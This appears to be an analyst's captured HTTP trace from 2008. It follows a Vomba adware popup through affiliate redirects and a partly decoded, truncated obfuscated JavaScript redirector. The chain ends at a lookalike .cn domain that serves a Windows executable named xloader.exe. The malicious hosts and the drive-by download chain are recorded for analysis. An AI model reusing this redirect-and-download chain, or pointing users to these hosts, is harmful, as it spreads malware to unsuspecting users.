POST /vomba/popup.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Vomba
Host: services.vombanetwork.com
Content-Length: 366
Cache-Control: no-cache
Cookie: __utma=...
hwd=...&ac=202&sac=1000&ver=1020001&pop=8&time=...&his=uid:...|--&keyword=www.gevalia.com|image|home|gevalia.com|gevalia%20com|gevalia|&trigger_domain=www.gevalia.com&trigger_url=%2FGevalia%2Fimages%2Fcommon%2Fdot_clear.gif%3F%26mid%3Db4fZXZnQ%26ptid%3DHOME
HTTP/1.1 200 OK
Date: Sat, 11 Oct 2008 06:32:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
P3P: CP="NON NID PSAa PSDa OUR IND NAV"
Set-Cookie: ...
Content-Length: 1303
Content-Type: text/html; charset=UTF-8
1
1
1
1
0
1
0
1
550
750
0
0
http%3A%2F%2Fwww.doubleyourctr.com%2Fgevalia.htm
0
...
...
iadv10178
http://mediatraffic.com
...
Mon, 10-Nov-2008 5:32:50 GMT
0
3
-1
-1
-1
-1
NORS
GET /gevalia.htm HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: www.doubleyourctr.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 11 Oct 2008 06:32:50 GMT
Server: Apache
Last-Modified: Sun, 21 Sep 2008 16:21:44 GMT
ETag: "3dc208-4ed9-48d67498"
Accept-Ranges: bytes
Content-Length: 20185
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Please wait..
GET /afclick.php?o=3882&b=x2mhm0x0&p=9136&l=1&s=tm HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: www.lynxtrack.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 11 Oct 2008 06:32:56 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOR DSP COR ADM OUR"
Set-Cookie: afclick_3882=1223706776%2B3882%2B9136%2Btm%2Bx2mhm0x0%2B9f2b09a0-e8ae-102b-9f5a-001372fd42f8%2B1%2B0; expires=Sat, 11-Oct-2008 08:32:56 GMT; path=/; domain=.lynxtrack.com
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
If this page does not load please click here.
--> Decoding and partially reformatting a portion of the encoded JavaScript found above
function zhjI(fuJ){
function wXul(eIfHsa){
var tmDC=0;
var ilpI=eIfHsa.length;
var iHUzIn=0;
while(iHUzInggx.length)yhqI=0;
if(zifvHGv>zsQzva.length)zifv%
...
GET /bizhost.cn/ HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.doubleyourctr.com/gevalia.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: www.doubleyourctr.com.2d6a235d6093b2a6.axa3.cn
Connection: Keep-Alive
HTTP/1.1 302 Found
Server: nginx/0.6.31
Date: Sat, 11 Oct 2008 14:26:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Location: http://www.google.com.br.updatesoftware.index.d81f0f02cd6a877358cde8fbdbad89a5.qwertycn.cn/myspace.cn/index.php
Content-Length: 0
GET /myspace.cn/index.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.doubleyourctr.com/gevalia.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Connection: Keep-Alive
Host: www.google.com.br.updatesoftware.index.d81f0f02cd6a877358cde8fbdbad89a5.qwertycn.cn
HTTP/1.1 200 OK
Server: nginx/0.6.31
Date: Sat, 11 Oct 2008 14:26:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Content-Length: 1155
GET /myspace.cn/load.php HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: www.google.com.br.updatesoftware.index.d81f0f02cd6a877358cde8fbdbad89a5.qwertycn.cn
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/0.6.31
Date: Sat, 11 Oct 2008 14:26:11 GMT
Content-Type: application/octet-stream
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Accept-Ranges: bytes
Content-Length: 13312
Content-Disposition: inline; filename=xloader.exe
MZ..................@.......................................... !.L!This program cannot be run in DOS mode.
...